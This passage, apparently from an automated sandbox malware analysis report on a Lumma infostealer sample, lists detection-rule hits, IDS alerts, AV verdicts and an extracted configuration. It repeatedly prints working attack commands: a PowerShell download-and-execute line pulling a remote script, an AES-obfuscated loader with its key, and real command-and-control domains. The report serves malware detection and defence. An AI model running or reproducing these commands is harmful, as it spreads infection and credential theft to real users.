515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B30
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B30

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:21.640161+010020283713Unknown Traffic192.168.2.549983188.114.96.3443TCP
                  2024-12-31T09:26:22.578264+010020283713Unknown Traffic192.168.2.549984188.114.96.3443TCP
                  2024-12-31T09:26:23.554736+010020283713Unknown Traffic192.168.2.549986188.114.96.3443TCP
                  2024-12-31T09:26:24.607228+010020283713Unknown Traffic192.168.2.549987188.114.96.3443TCP
                  2024-12-31T09:26:25.693614+010020283713Unknown Traffic192.168.2.549988188.114.96.3443TCP
                  2024-12-31T09:26:28.157830+010020283713Unknown Traffic192.168.2.549989188.114.96.3443TCP
                  2024-12-31T09:26:29.077559+010020283713Unknown Traffic192.168.2.549990188.114.96.3443TCP
                  2024-12-31T09:26:30.056629+010020283713Unknown Traffic192.168.2.549991188.114.96.3443TCP
                  2024-12-31T09:26:31.060161+010020283713Unknown Traffic192.168.2.549992188.114.96.3443TCP
                  2024-12-31T09:26:32.005168+010020283713Unknown Traffic192.168.2.549993104.21.37.128443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:22.107850+010020546531A Network Trojan was detected192.168.2.549983188.114.96.3443TCP
                  2024-12-31T09:26:22.998796+010020546531A Network Trojan was detected192.168.2.549984188.114.96.3443TCP
                  2024-12-31T09:26:31.514585+010020546531A Network Trojan was detected192.168.2.549992188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:22.107850+010020498361A Network Trojan was detected192.168.2.549983188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:22.998796+010020498121A Network Trojan was detected192.168.2.549984188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:32.385525+010020084381A Network Trojan was detected104.21.37.128443192.168.2.549993TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-31T09:26:24.095583+010020480941Malware Command and Control Activity Detected192.168.2.549986188.114.96.3443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
                  Source: https://klipvumisui.shop/int_clp_sha.txtHAvira URL Cloud: Label: malware
                  Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
                  Source: https://klipvumisui.shop/hAvira URL Cloud: Label: malware
                  Source: https://klipvumisui.shop/int_clp_sha.txtsAvira URL Cloud: Label: malware
                  Source: https://klipvumisui.shop/int_clp_sha.txtrAvira URL Cloud: Label: malware
                  Source: 8.2.powershell.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "permissiblene.click"], "Build id": "yJaNLj--re5"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: hummskitnj.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: cashfuzysao.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: appliacnesot.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: screwamusresz.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: inherineau.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: scentniej.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: rebuildeso.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: prisonyfork.buzz
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: permissiblene.click
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: Workgroup: -
                  Source: 8.2.powershell.exe.400000.0.unpackString decryptor: yJaNLj--re5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004164FD CryptUnprotectData,8_2_004164FD
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49983 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49988 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49989 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49990 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49991 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49992 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49993 version: TLS 1.2
